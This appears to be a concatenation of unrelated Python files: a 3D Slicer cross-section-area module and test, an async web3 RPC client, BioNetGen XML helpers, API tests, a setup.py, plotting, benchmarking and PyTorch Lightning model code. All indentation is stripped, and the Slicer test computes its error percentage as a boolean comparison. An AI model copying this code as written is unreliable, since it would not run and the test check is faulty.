(volumeExtents[2]+volumeExtents[3])/2.0 if axisIndex!=1 else volumeExtents[3],
(volumeExtents[4]+volumeExtents[5])/2.0 if axisIndex!=2 else volumeExtents[5],
1
]
# Get physical coordinates from voxel coordinates
volumeIjkToRas = vtk.vtkMatrix4x4()
tempSegmentLabelmapVolumeNode.GetIJKToRASMatrix(volumeIjkToRas)
startPosition_Ras = np.array([0.0,0.0,0.0,1.0])
volumeIjkToRas.MultiplyPoint(startPosition_Ijk, startPosition_Ras)
endPosition_Ras = np.array([0.0,0.0,0.0,1.0])
volumeIjkToRas.MultiplyPoint(endPosition_Ijk, endPosition_Ras)
volumePositionIncrement_Ras = np.array([0,0,0,1])
if numSlices > 1:
volumePositionIncrement_Ras = (endPosition_Ras - startPosition_Ras) / (numSlices - 1.0)
# If volume node is transformed, apply that transform to get volume's RAS coordinates
transformVolumeRasToRas = vtk.vtkGeneralTransform()
slicer.vtkMRMLTransformNode.GetTransformBetweenNodes(tempSegmentLabelmapVolumeNode.GetParentTransformNode(), None, transformVolumeRasToRas)
sliceNumberArray = vtk.vtkIntArray()
sliceNumberArray.SetName("Index")
slicePositionArray = vtk.vtkFloatArray()
slicePositionArray.SetNumberOfComponents(3)
slicePositionArray.SetComponentName(0, "R")
slicePositionArray.SetComponentName(1, "A")
slicePositionArray.SetComponentName(2, "S")
slicePositionArray.SetName("Position")
for i in range(numSlices):
sliceNumberArray.InsertNextValue(i)
point_VolumeRas = startPosition_Ras + i * volumePositionIncrement_Ras
point_Ras = transformVolumeRasToRas.TransformPoint(point_VolumeRas[0:3])
slicePositionArray.InsertNextTuple3(*point_Ras)
table.AddColumn(sliceNumberArray)
tableNode.SetColumnDescription(sliceNumberArray.GetName(), "Index of " + axis)
tableNode.SetColumnUnitLabel(sliceNumberArray.GetName(), "voxel")
table.AddColumn(slicePositionArray)
tableNode.SetColumnDescription(slicePositionArray.GetName(), "RAS position of slice center")
tableNode.SetColumnUnitLabel(slicePositionArray.GetName(), "mm") # TODO: use length unit
narray = slicer.util.arrayFromVolume(tempSegmentLabelmapVolumeNode)
areaArray = vtk.vtkFloatArray()
segmentName = segmentationNode.GetSegmentation().GetSegment(segmentID).GetName()
areaArray.SetName(segmentName)
# Convert number of voxels to area in mm2
spacing = tempSegmentLabelmapVolumeNode.GetSpacing()
areaOfPixelMm2 = spacing[0] * spacing[1] * spacing[2] / spacing[axisIndex]
# Count number of >0 voxels for each slice
for i in range(numSlices):
if axisIndex == 0:
areaBySliceInVoxels = np.count_nonzero(narray[:,:,i])
elif axisIndex == 1:
areaBySliceInVoxels = np.count_nonzero(narray[:, i, :])
elif axisIndex == 2:
areaBySliceInVoxels = np.count_nonzero(narray[i, :, :])
areaBySliceInMm2 = areaBySliceInVoxels * areaOfPixelMm2
areaArray.InsertNextValue(areaBySliceInMm2)
tableNode.AddColumn(areaArray)
tableNode.SetColumnUnitLabel(areaArray.GetName(), "mm2") # TODO: use length unit
tableNode.SetColumnDescription(areaArray.GetName(), "Cross-section area")
# Make a plot series node for this column.
plotSeriesNode = slicer.mrmlScene.AddNewNodeByClass("vtkMRMLPlotSeriesNode", segmentName)
plotSeriesNode.SetAndObserveTableNodeID(tableNode.GetID())
plotSeriesNode.SetXColumnName("Index")
plotSeriesNode.SetYColumnName(segmentName)
plotSeriesNode.SetUniqueColor()
# Add this series to the plot chart node created above.
plotChartNode.AddAndObservePlotSeriesNodeID(plotSeriesNode.GetID())
finally:
# Remove temporary volume node
colorNode = tempSegmentLabelmapVolumeNode.GetDisplayNode().GetColorNode()
if colorNode:
slicer.mrmlScene.RemoveNode(colorNode)
slicer.mrmlScene.RemoveNode(tempSegmentLabelmapVolumeNode)
logging.info('Processing completed')
def showChart(self, plotChartNode):
# Choose a layout where plots are visible
layoutManager = slicer.app.layoutManager()
layoutWithPlot = slicer.modules.plots.logic().GetLayoutWithPlot(layoutManager.layout)
layoutManager.setLayout(layoutWithPlot)
# Select chart in plot view
plotWidget = layoutManager.plotWidget(0)
plotViewNode = plotWidget.mrmlPlotViewNode()
plotViewNode.SetPlotChartNodeID(plotChartNode.GetID())
def showTable(self, tableNode):
# Choose a layout where plots are visible
layoutManager = slicer.app.layoutManager()
layoutWithPlot = slicer.modules.tables.logic().GetLayoutWithTable(layoutManager.layout)
layoutManager.setLayout(layoutWithPlot)
# Select chart in plot view
tableWidget = layoutManager.tableWidget(0)
tableWidget.tableView().setMRMLTableNode(tableNode)
#
# SegmentCrossSectionAreaTest
#
class SegmentCrossSectionAreaTest(ScriptedLoadableModuleTest):
"""
This is the test case for your scripted module.
Uses ScriptedLoadableModuleTest base class, available at:
https://github.com/Slicer/Slicer/blob/master/Base/Python/slicer/ScriptedLoadableModule.py
"""
def setUp(self):
""" Do whatever is needed to reset the state - typically a scene clear will be enough.
"""
slicer.mrmlScene.Clear(0)
def runTest(self):
"""Run as few or as many tests as needed here.
"""
self.setUp()
self.test_SegmentCrossSectionArea1()
def test_SegmentCrossSectionArea1(self):
""" Ideally you should have several levels of tests. At the lowest level
tests should exercise the functionality of the logic with different inputs
(both valid and invalid). At higher levels your tests should emulate the
way the user would interact with your code and confirm that it still works
the way you intended.
One of the most important features of the tests is that it should alert other
developers when their changes will have an impact on the behavior of your
module. For example, if a developer removes a feature that you depend on,
your test should break so they know that the feature is needed.
"""
self.delayDisplay("Starting the test")
# Load master volume
import SampleData
sampleDataLogic = SampleData.SampleDataLogic()
masterVolumeNode = sampleDataLogic.downloadMRBrainTumor1()
# Create segmentation
segmentationNode = slicer.vtkMRMLSegmentationNode()
slicer.mrmlScene.AddNode(segmentationNode)
segmentationNode.CreateDefaultDisplayNodes() # only needed for display
segmentationNode.SetReferenceImageGeometryParameterFromVolumeNode(masterVolumeNode)
# Create a sphere shaped segment
radius = 20
tumorSeed = vtk.vtkSphereSource()
tumorSeed.SetCenter(-6, 30, 28)
tumorSeed.SetRadius(radius)
tumorSeed.SetPhiResolution(120)
tumorSeed.SetThetaResolution(120)
tumorSeed.Update()
segmentId = segmentationNode.AddSegmentFromClosedSurfaceRepresentation(tumorSeed.GetOutput(), "Tumor",
[1.0, 0.0, 0.0])
tableNode = slicer.mrmlScene.AddNewNodeByClass("vtkMRMLTableNode", "Segment cross-section area table")
plotChartNode = slicer.mrmlScene.AddNewNodeByClass("vtkMRMLPlotChartNode", "Segment cross-section area plot")
logic = SegmentCrossSectionAreaLogic()
logic.run(segmentationNode, masterVolumeNode, "slice", tableNode, plotChartNode)
logic.showChart(plotChartNode)
self.assertEqual(tableNode.GetNumberOfColumns(), 3)
self.assertEqual(tableNode.GetNumberOfColumns(), 3)
# Compute error
crossSectionAreas = slicer.util.arrayFromTableColumn(tableNode, "Tumor")
largestCrossSectionArea = crossSectionAreas.max()
import math
expectedlargestCrossSectionArea = radius*radius*math.pi
logging.info("Largest cross-section area: {0:.2f}".format(largestCrossSectionArea))
logging.info("Expected largest cross-section area: {0:.2f}".format(expectedlargestCrossSectionArea))
errorPercent = 100.0 * abs(largestCrossSectionArea - expectedlargestCrossSectionArea) < expectedlargestCrossSectionArea
logging.info("Largest cross-section area error: {0:.2f}%".format(errorPercent))
# Error between expected and actual cross section is due to finite resolution of the segmentation.
# It should not be more than a few percent. The actual error in this case is around 1%, but use 2% to account for
# numerical differences between different platforms.
self.assertTrue(errorPercent < 2.0)
self.delayDisplay('Test passed')
|
156769
|
import asyncio
import itertools
from typing import Optional, Dict, Any, Union, List
import logging
import websockets
import json
from web3 import Web3
from .subscription import Subscription
from .methods import RPCMethod
from .contract import DeployedContract
from .types import Wei, Address, HexString
from .transport import BaseTransport
def _format_block_identifier(block_identifier: Union[int, str, bytes]):
if block_identifier is None:
return 'latest'
elif isinstance(block_identifier, int):
return hex(block_identifier)
else:
return block_identifier
class AsyncWeb3:
logger = logging.getLogger("async_web3.AsyncWeb3")
def __init__(self, transport: BaseTransport):
self._trasport = transport
self.rpc_counter = itertools.count(1)
self._requests: Dict[int, asyncio.Future] = {}
self._subscriptions: Dict[str, asyncio.Queue] = {}
async def connect(self, *args, **kwargs):
await self._trasport.connect(*args, **kwargs)
asyncio.get_event_loop().create_task(self._process())
async def is_connect(self):
try:
await self.client_version
except Exception:
return False
return True
@property
async def client_version(self) -> str:
return await self._do_request(RPCMethod.web3_clientVersion)
@property
async def accounts(self):
return await self._do_request(RPCMethod.eth_accounts)
@property
async def block_number(self) -> int:
hex_block = await self._do_request(RPCMethod.eth_blockNumber)
return int(hex_block, 16)
@property
async def gas_price(self) -> Wei:
return Wei(await self._do_request(RPCMethod.eth_gasPrice))
async def get_balance(self, address: Address) -> Wei:
assert isinstance(address, Address)
return Wei(await self._do_request(RPCMethod.eth_getBalance, [address]))
async def get_transaction_count(self, address: Address, block_identifier: Union[int, str, bytes] = None) -> Wei:
block_identifier = _format_block_identifier(block_identifier)
return Wei(await self._do_request(RPCMethod.eth_getTransactionCount, [address, block_identifier]))
async def get_storage_at(
self, address: Address, storage_position: Union[int, str], block: Any
) -> str:
if isinstance(block, str) and block in ["latest", "earliest", "pending"]:
block_param = block
else:
block_param = Web3.toHex(block)
return await self._do_request(
RPCMethod.eth_getStorageAt,
[address, Web3.toHex(storage_position), block_param],
)
async def get_block_by_hash(self, hash_hex: str, with_details: bool = False):
return await self._do_request(
RPCMethod.eth_getBlockByHash, [hash_hex, with_details]
)
async def get_block_by_number(self, block_number: int, with_details: bool = False):
return await self._do_request(
RPCMethod.eth_getBlockByNumber, [Web3.toHex(block_number), with_details]
)
async def call(self, call_transaction: Dict, block_identifier: Union[int, str, bytes] = None):
block_identifier = _format_block_identifier(block_identifier)
return await self._do_request(RPCMethod.eth_call, [call_transaction, block_identifier])
async def send_raw_transaction(self, txdata):
return await self._do_request(RPCMethod.eth_sendRawTransaction, [txdata])
async def get_transaction_receipt(self, txhash):
return await self._do_request(RPCMethod.eth_getTransactionReceipt, [txhash])
async def get_transaction(self, txhash):
return await self._do_request(RPCMethod.eth_getTransactionByHash, [txhash])
async def get_raw_transaction(self, txhash):
return await self._do_request(RPCMethod.eth_getRawTransactionByHash, [txhash])
async def subscribe_block(self) -> Subscription:
return await self._do_subscribe("newHeads")
async def subscribe_syncing(self) -> Subscription:
return await self._do_subscribe("syncing")
async def subscribe_logs(self, **options) -> Subscription:
return await self._do_subscribe("logs", options)
async def subscribe_new_pending_transaction(self) -> Subscription:
return await self._do_subscribe("newPendingTransactions")
async def unsubscribe(self, subscription: Subscription):
assert isinstance(subscription, Subscription)
response = await self._do_request(RPCMethod.eth_unsubscribe, [subscription.id])
assert response
queue = self._subscriptions[subscription.id]
del self._subscriptions[subscription.id]
queue.task_done()
def contract(self, address: Address, abi: List) -> DeployedContract:
assert isinstance(address, Address)
return DeployedContract(self, address, abi)
async def _do_subscribe(self, *args):
subscription_id = await self._do_request(RPCMethod.eth_subscribe, args)
queue = asyncio.Queue()
self._subscriptions[subscription_id] = queue
return Subscription(subscription_id, queue)
async def _do_request(self, method, params: Any = None):
request_id = next(self.rpc_counter)
rpc_dict = {
"jsonrpc": "2.0",
"method": method,
"params": params or [],
"id": request_id,
}
encoded = json.dumps(rpc_dict).encode("utf-8")
fut = asyncio.get_event_loop().create_future()
self._requests[request_id] = fut
await self._trasport.send(encoded)
self.logger.debug(f"outbound: {encoded}")
result = await fut
del self._requests[request_id]
return result
async def _process(self):
while True:
msg = await self._trasport.receive()
if msg is None:
break
self.logger.debug(f"inbound: {msg}")
j = json.loads(msg)
if "method" in j and j["method"] == "eth_subscription":
params = j["params"]
subscription_id = params["subscription"]
if subscription_id in self._subscriptions:
# TODO: maybe wrap this as block info?
self._subscriptions[subscription_id].put_nowait(params["result"])
if "id" in j:
request_id = j["id"]
if request_id in self._requests:
self._requests[request_id].set_result(j["result"])
|
156787
|
from lxml import etree
def create_property_node(parentNode, key, value):
if value.startswith('"'):
propertyNode = etree.SubElement(parentNode, "Property", id=key, value=value.strip('"'), type="str")
else:
propertyNode = etree.SubElement(parentNode, "Property", id=key, value=value, type="num")
return propertyNode
def write2bngxmle(properties_dict, model_name):
'''
creates a bng-xml v1.1 spec from model properties
'''
root = etree.Element("bngexperimental", version="1.1", name=model_name)
if len(properties_dict['modelProperties']) > 0:
listOfModelProperties = etree.SubElement(root, "ListOfProperties")
for element in properties_dict['modelProperties']:
create_property_node(listOfModelProperties, element.strip().lower(), properties_dict['modelProperties'][element].strip())
listOfCompartments = etree.SubElement(root, "ListOfCompartments")
for element in properties_dict['compartmentProperties']:
compartmentNode = etree.SubElement(listOfCompartments, "Compartment", id=element)
listOfCompartmentProperties = etree.SubElement(compartmentNode, "ListOfProperties")
for propertyEntry in properties_dict['compartmentProperties'][element]:
create_property_node(listOfCompartmentProperties, propertyEntry[0].strip().lower(), propertyEntry[1].strip())
listOfMoleculeTypes = etree.SubElement(root, "ListOfMoleculeTypes")
for element in properties_dict['moleculeProperties']:
moleculeNode = etree.SubElement(listOfMoleculeTypes, "MoleculeType", id=element)
listOfMoleculeProperties = etree.SubElement(moleculeNode, "ListOfProperties")
for propertyEntry in properties_dict['moleculeProperties'][element]:
propertyNode = create_property_node(listOfMoleculeProperties, propertyEntry[0].strip().lower(), propertyEntry[1]['name'].strip())
if len(propertyEntry[1]['parameters']) > 0:
sublistOfMoleculeProperties = etree.SubElement(propertyNode, "ListOfProperties")
for parameter in propertyEntry[1]['parameters']:
etree.SubElement(sublistOfMoleculeProperties, "Property", id=parameter[0], value=parameter[1])
return etree.tostring(root, pretty_print=True)
def merge_bxbxe(base_bngxml, extended_bngxml):
'''
temporary method to concatenate a bng-xml 1.0 and bng-xml 1.1 definition
'''
basedoc = etree.parse(base_bngxml).getroot()
edoc = etree.parse(extended_bngxml).getroot()
basedoc.append(edoc)
return etree.tostring(basedoc, encoding='unicode', pretty_print=True)
|
156794
|
import pytest
from metaspace.tests.utils import sm
def test_get_all_projects(sm):
projects = sm.projects.get_all_projects()
assert len(projects) > 0
def test_get_my_projects(sm):
projects = sm.projects.get_my_projects()
assert len(projects) > 0
assert all(p['currentUserRole'] for p in projects)
def test_get_project(sm):
project_id = sm.projects.get_all_projects()[0]['id'] # assuming this works
project = sm.projects.get_project(project_id)
assert project['id'] == project_id
assert project['name']
def test_add_project_external_link(sm):
# find a project that the current user manages
my_projects = sm.projects.get_my_projects()
project_id = [p['id'] for p in my_projects if p['currentUserRole'] == 'MANAGER'][0]
provider = 'MetaboLights'
link = 'https://www.ebi.ac.uk/metabolights/MTBLS313'
result = sm.projects.add_project_external_link(project_id, provider, link)
assert any(ext_link == {'provider': provider, 'link': link} for ext_link in result)
def test_remove_project_external_link(sm):
# find a project that the current user manages
my_projects = sm.projects.get_my_projects()
project_id = [p['id'] for p in my_projects if p['currentUserRole'] == 'MANAGER'][0]
provider = 'MetaboLights'
link = 'https://www.ebi.ac.uk/metabolights/MTBLS313'
result = sm.projects.remove_project_external_link(project_id, provider, link)
assert not any(ext_link == {'provider': provider, 'link': link} for ext_link in result)
|
156795
|
from pymusicdl.modules.common import common
from pymusicdl.modules.spotify_downloader import spotify_downloader
from pymusicdl.modules.ytDownloader import yt_downloader
from pymusicdl.modules.picker import *
|
156823
|
from pathlib import Path
import re
# ref: https://extendsclass.com/regex/e6adb72
empty_classdef = (
r"(?P<indent1> ?)class\s*(?P<class>\s*.+\s*):(?P<LF>\r?\n)(?P<indent2> +)''\r?\n"
)
re_classdef = re.compile(empty_classdef, flags=re.MULTILINE)
repl_classdef = r"\g<indent1>class \g<class>:\g<LF>\g<indent2>def __init__(self):\g<LF>\g<indent2> ''\g<LF>\g<indent2> pass\g<LF>\g<LF>"
def add_init_methods(filename) -> int:
"""Add (missing) __init__ methods to a class using a regex
this assumes the (incorrect) classdef format that has been used by stubbers prior to version 1.4.0
and updates that to add the init.
"""
found = 0
with open(filename, mode="+r") as file:
content = file.read()
found = len(re_classdef.findall(content))
content = re_classdef.sub(repl_classdef, content)
# print(content)
file.seek(0)
file.write(content)
return found
print("Add missing __init__ methods to stub classes")
for stubfile in Path("./micropython-stubs/stubs").glob(r"**/*.py"):
print(stubfile, end=" ,")
x = add_init_methods(stubfile)
print(x)
for stubfile in Path("all_stubs").glob(r"**/*.py"):
print(stubfile)
|
156827
|
try:
from setuptools import setup
except ImportError:
from distutils.core import setup
try:
from pypandoc import convert
read_md = lambda f: convert(f, 'rst')
except ImportError:
print("warning: pypandoc module not found,"
"could not convert markdown README to RST")
read_md = lambda f: open(f, 'r').read()
config = {
'name': 'colour-valgrind',
'version': '0.3.9',
'description': 'Wraps Valgrind to colour the output.',
'long_description': read_md('README.md'),
'author': 'StarlitGhost',
'url': 'http://github.com/StarlitGhost/colour-valgrind',
'author_email': '<EMAIL>',
'classifiers': [
'Development Status :: 3 - Alpha',
'Environment :: Console',
'Intended Audience :: Developers',
'License :: OSI Approved :: MIT License',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Topic :: Software Development :: Debuggers',
'Topic :: Text Processing :: Filters',
'Topic :: Utilities',
],
'keywords': 'valgrind color colour filter',
'license': 'MIT',
'packages': ['colourvalgrind'],
'install_requires': [
'colorama',
'regex',
'six',
],
'entry_points': {
'console_scripts': ['colour-valgrind=colourvalgrind.command_line:main'],
},
'include_package_data': True,
}
setup(**config)
|
156838
|
import numpy as N
from traits.api import (HasTraits, Array, Range, Instance, Enum)
from traitsui.api import View, Item
from chaco.api import (ArrayPlotData, Plot, PlotLabel, ColorMapper, gray, pink,
jet)
from chaco.default_colormaps import fix
from enable.api import ComponentEditor
from AwesomeColorMaps import awesome, isoluminant
def bone(rng, **traits):
"""
Generator function for the 'bone' colormap. (Instead of faulty one
in Chaco.) Data from Matplotlib.
"""
_bone_data = {
'red': ((0., 0., 0.), (0.746032, 0.652778, 0.652778), (1.0, 1.0, 1.0)),
'green': ((0., 0., 0.), (0.365079, 0.319444, 0.319444),
(0.746032, 0.777778, 0.777778), (1.0, 1.0, 1.0)),
'blue': ((0., 0., 0.), (0.365079, 0.444444, 0.444444), (1.0, 1.0, 1.0))}
return ColorMapper.from_segment_map(_bone_data, range=rng, **traits)
class CameraImage(HasTraits):
data = Array()
data_store = Instance(ArrayPlotData)
plot = Instance(Plot)
hud_overlay = Instance(PlotLabel)
# Number of steps of 90 degrees to rotate the image before
# displaying it - must be between 0 and 3
rotate = Range(0, 3)
# Colormap to use for display; None means use the image's natural
# colors (if RGB data) or grayscale (if monochrome). Setting @cmap
# to a value coerces the image to monochrome.
cmap = Enum(None, gray, bone, pink, jet, isoluminant, awesome)
view = View(Item('plot', show_label=False, editor=ComponentEditor()))
def __init__(self, **traits):
super(CameraImage, self).__init__(**traits)
self._dims = (200, 320)
self.data_store = ArrayPlotData(image=self.data)
self._hud = dict()
self.plot = Plot(self.data_store)
# Draw the image
renderers = self.plot.img_plot('image', name='camera_image',
colormap=fix(gray, (0, 255)))
self._image = renderers[0]
self.plot.aspect_ratio = float(self._dims[1]) / self._dims[0]
self.hud_overlay = PlotLabel(text='', component=self.plot,
hjustify='left', overlay_position='inside bottom',
color='white')
self.plot.overlays.append(self.hud_overlay)
def _data_default(self):
return N.zeros(self._dims, dtype=N.uint8)
def _data_changed(self, value):
bw = (len(value.shape) == 2)
if not bw and self.cmap is not None:
# Selecting a colormap coerces the image to monochrome
# Use standard NTSC conversion formula
value = N.array(
0.2989 * value[..., 0]
+ 0.5870 * value[..., 1]
+ 0.1140 * value[..., 2])
value = N.rot90(value, self.rotate)
self.data_store['image'] = self.data = value
if self._dims != self.data.shape:
# Redraw the axes if the image is a different size
self.plot.delplot('camera_image')
self._dims = self.data.shape
renderers = self.plot.img_plot('image', name='camera_image',
colormap=self._get_cmap_function())
# colormap is ignored if image is RGB or RGBA
self._image = renderers[0]
# Make sure the aspect ratio is correct, even after resize
self.plot.aspect_ratio = float(self._dims[1]) / self._dims[0]
def _get_cmap_function(self):
return fix(
gray if self.cmap is None else self.cmap,
(0, 65535 if self.data.dtype == N.uint16 else 255))
def _cmap_changed(self, old_value, value):
# Must redraw the plot if data was RGB
if old_value is None or value is None:
self._data_changed(self.data)
cmap_func = self._get_cmap_function()
self._image.color_mapper = cmap_func(self._image.value_range)
def hud(self, key, text):
if text is None:
self._hud.pop(key, None)
else:
self._hud[key] = text
# Do the heads-up display
text = ''
for key in sorted(self._hud.keys()):
text += self._hud[key] + '\n\n'
self.hud_overlay.text = text
|
156876
|
import os
from experiments.experiments import ModelSelectionExperiment
from nilmlab.lab import TimeSeriesLength
dirname = os.path.dirname(__file__)
single_building_exp_checkpoint = os.path.join(dirname, '../results/cv1h.csv')
exp = ModelSelectionExperiment(cv=5)
exp.set_ts_len(TimeSeriesLength.WINDOW_1_HOUR)
exp.set_checkpoint_file(single_building_exp_checkpoint)
exp.run()
|
156897
|
from abc import abstractmethod
from numpy import eye, shape
from numpy.linalg import pinv
class Kernel(object):
def __init__(self):
pass
@abstractmethod
def kernel(self, X, Y=None):
raise NotImplementedError()
@staticmethod
def centering_matrix(n):
"""
Returns the centering matrix eye(n) - 1.0 / n
"""
return eye(n) - 1.0 / n
@staticmethod
def center_kernel_matrix(K):
"""
Centers the kernel matrix via a centering matrix H=I-1/n and returns HKH
"""
n = shape(K)[0]
H = eye(n) - 1.0 / n
return H.dot(K.dot(H))
def center_kernel_matrix_regression(K, Kz, epsilon):
"""
Centers the kernel matrix via a centering matrix R=I-Kz(Kz+\epsilonI)^{-1} and returns RKR
"""
n = shape(K)[0]
Rz = epsilon * pinv(Kz + epsilon * eye(n))
return Rz.dot(K.dot(Rz))
|
156971
|
import ray
from environment.rrt import RRTWrapper
from environment import utils
from environment import RealTimeEnv
from utils import (
parse_args,
load_config,
create_policies,
exit_handler
)
from environment import TaskLoader
import pickle
from signal import signal, SIGINT
from numpy import mean
from distribute import Pool
from os.path import exists
from tqdm import tqdm
if __name__ == "__main__":
args = parse_args()
args.gui = True
config = load_config(args.config)
env_conf = config['environment']
training_conf = config['training']
env_conf['min_ur5s_count'] = 1
env_conf['max_ur5s_count'] = 10
env_conf['task']['type'] = 'dynamic'
ray.init()
signal(SIGINT, lambda sig, frame: exit())
output_path = 'rrt_dynamic_benchmark_score.pkl'
if args.load:
output_path = 'policy_dynamic_benchmark_score.pkl'
benchmark_results = []
continue_benchmark = False
if exists(output_path):
# continue benchmark
benchmark_results = pickle.load(open(output_path, 'rb'))
continue_benchmark = True
finished_task_paths = [r['task']['task_path']
for r in benchmark_results]
task_loader = TaskLoader(
root_dir=args.tasks_path,
shuffle=True,
repeat=False)
training_conf['task_loader'] = task_loader
# set up policy if loaded
if args.load:
obs_dim = utils.get_observation_dimensions(
training_conf['observations'])
action_dim = 6
policy_manager = create_policies(
args=args,
training_config=config['training'],
action_dim=action_dim,
actor_obs_dim=obs_dim,
critic_obs_dim=obs_dim,
training=args.mode == 'train',
logger=None,
device='cpu')
policy = policy_manager.get_inference_nodes()[
'multiarm_motion_planner']
policy.policy.to('cpu')
training_conf['policy'] = policy
env = RealTimeEnv(
env_config=env_conf,
training_config=training_conf,
gui=args.gui,
logger=None)
env.set_memory_cluster_map(policy_manager.memory_map)
else:
RealTimeEnv = ray.remote(RealTimeEnv)
envs = [RealTimeEnv.remote(
env_config=env_conf,
training_config=training_conf,
gui=args.gui,
logger=None)
for _ in range(args.num_processes)]
env_pool = Pool(envs)
def callback(result):
benchmark_results.append(result)
if len(benchmark_results) % 100 == 0\
and len(benchmark_results) > 0:
print('Saving benchmark scores to ',
output_path)
with open(output_path, 'wb') as f:
pickle.dump(benchmark_results, f)
def pbar_update(pbar):
pbar.set_description(
'Average Success Rate : {:.04f}'.format(
mean([r['success_rate']
for r in benchmark_results])))
tasks = [t for t in task_loader
if not continue_benchmark
or t.task_path not in finished_task_paths]
if args.load:
with tqdm(tasks, dynamic_ncols=True, smoothing=0.01) as pbar:
for task in pbar:
callback(env.solve_task(task))
pbar_update(pbar)
else:
benchmark_results = env_pool.map(
exec_fn=lambda env, task: env.solve_task.remote(task),
iterable=tasks,
pbar_update=pbar_update,
callback_fn=callback
)
|
157113
|
p=21888242871839275222246405745257275088696311157297823662689037894645226208583
print("over 253 bit")
for i in range (10):
print(i, (p * i) >> 253)
def maxarg(x):
return x // p
print("maxarg")
for i in range(16):
print(i, maxarg(i << 253))
x=0x2c130429c1d4802eb8703197d038ebd5109f96aee333bd027963094f5bb33ad
y = x * 9
print(hex(y))
|
157118
|
import hashlib
import json
import os
from argparse import ArgumentParser, Namespace
from collections import defaultdict
from copy import deepcopy
from functools import partial
from typing import Dict, List, Optional, Type
import numpy as np
import pytorch_lightning as pl
import torch
import torch.nn as nn
import torch.nn.functional as F
import transformers
from torch import Tensor
from torch.utils.data import ConcatDataset, DataLoader, RandomSampler
from transformers import AutoConfig, AutoModel, AutoTokenizer
import constant
import util
from dataset.base import Dataset
from enumeration import Schedule, Split, Task
from metric import Metric
from model.module import Identity, InputVariationalDropout, MeanPooling, Transformer
class Model(pl.LightningModule):
def __init__(self, hparams):
super(Model, self).__init__()
self.optimizer = None
self.scheduler = None
self._metric: Optional[Metric] = None
self.metrics: Dict[str, Metric] = dict()
self.trn_datasets: List[Dataset] = None
self.val_datasets: List[Dataset] = None
self.tst_datasets: List[Dataset] = None
self.padding: Dict[str, int] = {}
self.base_dir: str = ""
self._batch_per_epoch: int = -1
self._comparsion: Optional[str] = None
self._selection_criterion: Optional[str] = None
if isinstance(hparams, dict):
hparams = Namespace(**hparams)
# self.hparams: Namespace = hparams
self.save_hyperparameters(hparams)
pl.seed_everything(hparams.seed)
self.tokenizer = AutoTokenizer.from_pretrained(hparams.pretrain)
self.model = self.build_model()
self.freeze_layers()
self.weight = nn.Parameter(torch.zeros(self.num_layers))
self.mapping = None
if hparams.mapping:
assert os.path.isfile(hparams.mapping)
self.mapping = torch.load(hparams.mapping)
util.freeze(self.mapping)
self.projector = self.build_projector()
self.dropout = InputVariationalDropout(hparams.input_dropout)
def build_model(self):
config = AutoConfig.from_pretrained(
self.hparams.pretrain, output_hidden_states=True
)
model = AutoModel.from_pretrained(self.hparams.pretrain, config=config)
return model
def freeze_layers(self):
if self.hparams.freeze_layer == -1:
return
elif self.hparams.freeze_layer >= 0:
for i in range(self.hparams.freeze_layer + 1):
if i == 0:
print("freeze embeddings")
self.freeze_embeddings()
else:
print(f"freeze layer {i}")
self.freeze_layer(i)
def freeze_embeddings(self):
if isinstance(self.model, transformers.BertModel) or isinstance(
self.model, transformers.RobertaModel
):
util.freeze(self.model.embeddings)
elif isinstance(self.model, transformers.XLMModel):
util.freeze(self.model.position_embeddings)
if self.model.n_langs > 1 and self.model.use_lang_emb:
util.freeze(self.model.lang_embeddings)
util.freeze(self.model.embeddings)
else:
raise ValueError("Unsupported model")
def freeze_layer(self, layer):
if isinstance(self.model, transformers.BertModel) or isinstance(
self.model, transformers.RobertaModel
):
util.freeze(self.model.encoder.layer[layer - 1])
elif isinstance(self.model, transformers.XLMModel):
util.freeze(self.model.attentions[layer - 1])
util.freeze(self.model.layer_norm1[layer - 1])
util.freeze(self.model.ffns[layer - 1])
util.freeze(self.model.layer_norm2[layer - 1])
else:
raise ValueError("Unsupported model")
@property
def hidden_size(self):
if isinstance(self.model, transformers.BertModel) or isinstance(
self.model, transformers.RobertaModel
):
return self.model.config.hidden_size
elif isinstance(self.model, transformers.XLMModel):
return self.model.dim
else:
raise ValueError("Unsupported model")
@property
def num_layers(self):
if isinstance(self.model, transformers.BertModel) or isinstance(
self.model, transformers.RobertaModel
):
return self.model.config.num_hidden_layers + 1
elif isinstance(self.model, transformers.XLMModel):
return self.model.n_layers + 1
else:
raise ValueError("Unsupported model")
@property
def batch_per_epoch(self):
if self.trn_datasets is None:
self.trn_datasets = self.prepare_datasets(Split.train)
if self._batch_per_epoch < 0:
total_datasize = sum([len(d) for d in self.trn_datasets])
self._batch_per_epoch = np.ceil(total_datasize / self.hparams.batch_size)
return self._batch_per_epoch
@property
def selection_criterion(self):
assert self._selection_criterion is not None
return self._selection_criterion
@property
def comparsion(self):
assert self._comparsion is not None
return self._comparsion
def setup_metrics(self):
assert self._metric is not None
langs = self.hparams.trn_langs + self.hparams.val_langs + self.hparams.tst_langs
langs = sorted(list(set(langs)))
for lang in langs:
self.metrics[lang] = deepcopy(self._metric)
self.reset_metrics()
def reset_metrics(self):
for metric in self.metrics.values():
metric.reset()
def build_projector(self):
hparams = self.hparams
if hparams.projector == "id":
return Identity()
elif hparams.projector == "meanpool":
return MeanPooling()
elif hparams.projector == "transformer":
return Transformer(
input_dim=self.hidden_size,
hidden_dim=hparams.projector_trm_hidden_size,
num_heads=hparams.projector_trm_num_heads,
dropout=hparams.projector_dropout,
num_layers=hparams.projector_trm_num_layers,
)
else:
raise ValueError(hparams.projector)
def get_mask(self, sent: Tensor):
mask = (sent != self.tokenizer.pad_token_id).long()
return mask
def encode_sent(
self,
sent: Tensor,
langs: Optional[List[str]] = None,
segment: Optional[Tensor] = None,
model: Optional[transformers.PreTrainedModel] = None,
return_raw_hidden_states: bool = False,
):
if model is None:
model = self.model
mask = self.get_mask(sent)
if isinstance(model, transformers.BertModel) or isinstance(
self.model, transformers.RobertaModel
):
output = model(input_ids=sent, attention_mask=mask, token_type_ids=segment)
elif isinstance(model, transformers.XLMModel):
lang_ids: Optional[torch.Tensor]
if langs is not None:
try:
batch_size, seq_len = sent.shape
lang_ids = torch.tensor(
[self.tokenizer.lang2id[lang] for lang in langs],
dtype=torch.long,
device=sent.device,
)
lang_ids = lang_ids.unsqueeze(1).expand(batch_size, seq_len)
except KeyError as e:
print(f"KeyError with missing language {e}")
lang_ids = None
output = model(
input_ids=sent,
attention_mask=mask,
langs=lang_ids,
token_type_ids=segment,
)
else:
raise ValueError("Unsupported model")
if return_raw_hidden_states:
return output["hidden_states"]
